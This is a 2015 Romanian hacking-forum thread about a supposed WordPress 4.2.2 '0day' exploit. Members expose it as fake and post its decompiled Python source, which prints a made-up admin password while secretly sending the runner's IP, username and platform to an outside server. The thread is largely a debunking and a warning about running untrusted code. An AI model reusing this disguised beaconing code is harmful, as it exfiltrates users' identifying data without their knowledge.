1337 Posted June 21, 2015 Report Share Posted June 21, 2015 (edited) Luat de pe un forum privat din afara.Facut in Python, primul argument e site-ul.Scoate userul si parola lui hashed.Usage: wp4.2.2_0day.pyc site// FAKE Edited June 21, 2015 by Nytro Quote Link to comment Share on other sites More sharing options...
valoaredaiamare Posted June 21, 2015 Report Share Posted June 21, 2015 RuntimeError: Bad magic number in .pyc file Quote Link to comment Share on other sites More sharing options...
socket Posted June 21, 2015 Report Share Posted June 21, 2015 (edited) fake, Edited June 21, 2015 by socket Quote Link to comment Share on other sites More sharing options...
Worm64 Posted June 21, 2015 Report Share Posted June 21, 2015 Fisierul decompilat:# Embedded file name: test.pyimport sysimport uuidfrom md5 import md5from urllib2 import urlopenimport platformimport osimport timex = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest()x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform()x2 = urlopen(x1).read()if len(sys.argv) == 1: sys.exit('No argument specified')print 'Wordpress 4.2.2 0day exploit'time.sleep(2)print '[+] Trying: %s' % str(sys.argv[1])time.sleep(5)print '[+] user: admin'time.sleep(3)print x Quote Link to comment Share on other sites More sharing options...
Speed123 Posted June 21, 2015 Report Share Posted June 21, 2015 (edited) RuntimeError: Bad magic number in .pyc fileSe mai uita si la valoare. Edited June 21, 2015 by Speed123 Quote Link to comment Share on other sites More sharing options...
Byte-ul Posted June 21, 2015 Report Share Posted June 21, 2015 # Embedded file name: test.pyimport sysimport uuidfrom md5 import md5from urllib2 import urlopenimport platformimport osimport timex = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest()x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform()x2 = urlopen(x1).read()if len(sys.argv) == 1: sys.exit('No argument specified')print 'Wordpress 4.2.2 0day exploit'time.sleep(2)print '[+] Trying: %s' % str(sys.argv[1])time.sleep(5)print '[+] user: admin'time.sleep(3)print x Quote Link to comment Share on other sites More sharing options...
askwrite Posted June 21, 2015 Report Share Posted June 21, 2015 Quote Link to comment Share on other sites More sharing options...
socket Posted June 21, 2015 Report Share Posted June 21, 2015 Cred ca este fake Quote Link to comment Share on other sites More sharing options...
thepro Posted June 21, 2015 Report Share Posted June 21, 2015 (edited) // Edited November 4, 2018 by thepro Outdated. Quote Link to comment Share on other sites More sharing options...
1337 Posted June 21, 2015 Author Report Share Posted June 21, 2015 Well congrats, vad ca unii verifica ce ruleaza, altii nu prea.Asta tre' sa fie o lectie pentru toti. @Nytro trebuia sa-l lasi iar ceilalti trebuiau sa nu publice codul sursa.rezultate: Quote Link to comment Share on other sites More sharing options...